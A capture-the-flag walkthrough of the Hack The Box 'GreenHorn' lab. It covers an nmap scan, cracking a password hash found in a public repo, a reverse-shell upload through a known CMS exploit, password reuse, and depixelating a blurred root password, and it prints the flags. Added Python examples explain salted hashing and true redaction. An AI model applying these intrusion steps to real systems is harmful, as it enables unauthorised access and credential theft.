HTB - GreenHorn [Easy]
tcp
> TARGET=10.129.90.212 && nmap -p- -sC -sV -Pn -vvv -oN nmap_tcp_all_$TARGET.nmap $TARGET
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOp+cK9ugCW282Gw6Rqe+Yz+5fOGcZzYi8cmlGmFdFAjI1347tnkKumDGK1qJnJ1hj68bmzOONz/x1CMeZjnKMw=
| 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZQbCc8u6r2CVboxEesTZTMmZnMuEidK9zNjkD2RGEv
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open ppp? syn-ack ttl 63
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=c85ee957e6e5e3fc; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=6EGwaiK6JbowMQm-YL1Er4HkC4s6MTcyMTYwNjcyNzQzNDMyMDUyMQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 22 Jul 2024 00:05:27 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>GreenHorn</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=b22b65954255c9db; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=jFEOATX_tovMFMbuXnNeqeh6Z-o6MTcyMTYwNjczMzYyMzg1NTA4OQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 22 Jul 2024 00:05:33 GMT
|_ Content-Length: 0
foothold
- browse to http://greenhorn.htb:3000/ and sign up an account
- check the code at http://greenhorn.htb:3000/GreenAdmin/GreenHorn/src/branch/main/data/settings/pass.php for a password hash
- crack it on https://crackstation.net/ to get iloveyou1
- login at http://greenhorn.htb/login.php
- check out exploit: https://www.exploit-db.com/exploits/51592
- create a file.php and zip it to file.zip
- use shell /usr/share/webshells/php/php-reverse-shell.php
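Added example (not part of the original writeup or the target application): why a password hash committed to a public repo, as in the pass.php above, falls to a lookup site, and what the storage should look like instead. The pass.php content below is constructed, and it is an assumption that the stored value was an unsalted SHA-512 digest.

```python
import hashlib
import hmac
import os
import re

# Constructed stand-in for a committed data/settings/pass.php; the real file's
# contents are not reproduced here. Assumption: the app stored an unsalted SHA-512.
PASS_PHP = "<?php\n$ww = '%s';\n?>\n" % hashlib.sha512(b"iloveyou1").hexdigest()

# Hex-digest lengths of common unsalted fast hashes, used to classify a finding.
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
HEX_LITERAL = re.compile(r"'([0-9a-f]{32,128})'")

def find_unsalted_digests(php_source):
    """Secret-scanning check: quoted hex literals whose length matches a fast hash."""
    hits = []
    for m in HEX_LITERAL.finditer(php_source):
        algo = DIGEST_LENGTHS.get(len(m.group(1)))
        if algo:
            hits.append((algo, m.group(1)))
    return hits

def lookup_unsalted(algo, digest, wordlist):
    """Why a public lookup site works: an unsalted digest is a fixed function of the
    password, so one precomputed table serves every site. 'wordlist' is a constructed
    three-word stand-in for such a table."""
    table = {hashlib.new(algo, w.encode()).hexdigest(): w for w in wordlist}
    return table.get(digest)

def pbkdf2_store(password, salt=None, iterations=600_000):
    """Mitigation: per-user random salt plus a slow KDF. Two stores of the same
    password differ, so no table built elsewhere matches this one."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())

def pbkdf2_verify(password, stored):
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for algo, digest in find_unsalted_digests(PASS_PHP):
        print(algo, "->", lookup_unsalted(algo, digest, ["password", "iloveyou1", "admin"]))
    a, b = pbkdf2_store("iloveyou1"), pbkdf2_store("iloveyou1")
    print("salted stores differ:", a != b, "verify:", pbkdf2_verify("iloveyou1", a))
```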
user: junior
- reuse password iloveyou1
$ su junior
Password: iloveyou1
id
uid=1000(junior) gid=1000(junior) groups=1000(junior)
bash -i
bash: cannot set terminal process group (999): Inappropriate ioctl for device
bash: no job control in this shell
junior@greenhorn:/var/www$ cd
cd
junior@greenhorn:~$ ls
ls
user.txt
Using OpenVAS.pdf
junior@greenhorn:~$ cat user.txt
cat user.txt
7be9d6dfe2f80b8c6bb9c69da3f653b6
root
- download the pdf file
- extract the blurred image from pdf using https://pdfcandy.com/
- use https://github.com/spipm/Depix/tree/main to unpixel the image
python3 Depix/depix.py -p file.png -s Depix/images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-22 13:51:09,749 - Loading pixelated image from file.png
2024-07-22 13:51:09,766 - Loading search image from Depix/images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-22 13:51:10,349 - Finding color rectangles from pixelated space
2024-07-22 13:51:10,350 - Found 252 same color rectangles
2024-07-22 13:51:10,350 - 190 rectangles left after moot filter
2024-07-22 13:51:10,350 - Found 1 different rectangle sizes
2024-07-22 13:51:10,350 - Finding matches in search image
2024-07-22 13:51:10,350 - Scanning 190 blocks with size (5, 5)
2024-07-22 13:51:10,372 - Scanning in searchImage: 0/1674
2024-07-22 13:51:45,747 - Removing blocks with no matches
2024-07-22 13:51:45,747 - Splitting single matches and multiple matches
2024-07-22 13:51:45,751 - [16 straight matches | 174 multiple matches]
2024-07-22 13:51:45,751 - Trying geometrical matches on single-match squares
2024-07-22 13:51:45,964 - [29 straight matches | 161 multiple matches]
2024-07-22 13:51:45,964 - Trying another pass on geometrical matches
2024-07-22 13:51:46,154 - [41 straight matches | 149 multiple matches]
2024-07-22 13:51:46,154 - Writing single match results to output
2024-07-22 13:51:46,154 - Writing average results for multiple matches to output
2024-07-22 13:51:48,221 - Saving output image to: output.png
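Added example (not from the writeup or from Depix itself) showing why the pixelated password above was recoverable: a mosaic filter is a deterministic block average, so different secrets leave different, matchable tiles, whereas overwriting the region with a constant leaves nothing to reconstruct. The two "secret" images are constructed ASCII bitmaps.

```python
def from_ascii(art):
    """Constructed grayscale 'image': '#' is black (0), '.' is white (255)."""
    return [[0 if c == "#" else 255 for c in line] for line in art]

# Two constructed secrets of the same size, standing in for two different
# passwords rendered in a fixed-width font.
SECRET_A = from_ascii(["##..##..", "##..##..", "..##..##", "..##..##"])
SECRET_B = from_ascii(["########", "........", "########", "........"])

def pixelate(img, block):
    """Mosaic filter used for 'blurring': every block x block tile becomes its average.
    It is deterministic, so a glyph at a given offset always yields the same tiles;
    Depix recovers text by matching those tiles against a pixelated search image."""
    h, w = len(img), len(img[0])
    out = [row[:] for row in img]
    for y in range(0, h, block):
        for x in range(0, w, block):
            ys, xs = range(y, min(y + block, h)), range(x, min(x + block, w))
            avg = sum(img[yy][xx] for yy in ys for xx in xs) // (len(ys) * len(xs))
            for yy in ys:
                for xx in xs:
                    out[yy][xx] = avg
    return out

def redact(img, fill=0):
    """Destructive redaction: overwrite the region with a constant. The output carries
    no bits that depend on the secret, so nothing can be reconstructed from it."""
    return [[fill] * len(row) for row in img]

def leaks(transform, img_a, img_b):
    """A redaction leaks if two different secrets are still distinguishable afterwards."""
    return transform(img_a) != transform(img_b)

def tile_signature(img, block):
    """Distinct tile values left by pixelation; more distinct values means more
    information for a tile-matching tool such as Depix to work with."""
    pix = pixelate(img, block)
    return sorted({pix[y][x] for y in range(0, len(pix), block)
                   for x in range(0, len(pix[0]), block)})

if __name__ == "__main__":
    print("pixelate leaks:", leaks(lambda i: pixelate(i, 2), SECRET_A, SECRET_B))  # True
    print("redact leaks:  ", leaks(redact, SECRET_A, SECRET_B))                    # False
```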
junior@greenhorn:~$ su
su
Password: sidefromsidetheothersidesidefromsidetheotherside
root@greenhorn:/home/junior# cd
cd
root@greenhorn:~# cat root.txt
cat root.txt
799c4207af911f6dfcd74e996e6c7d0c
- depixelized root password: sidefromsidetheothersidesidefromsidetheotherside
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack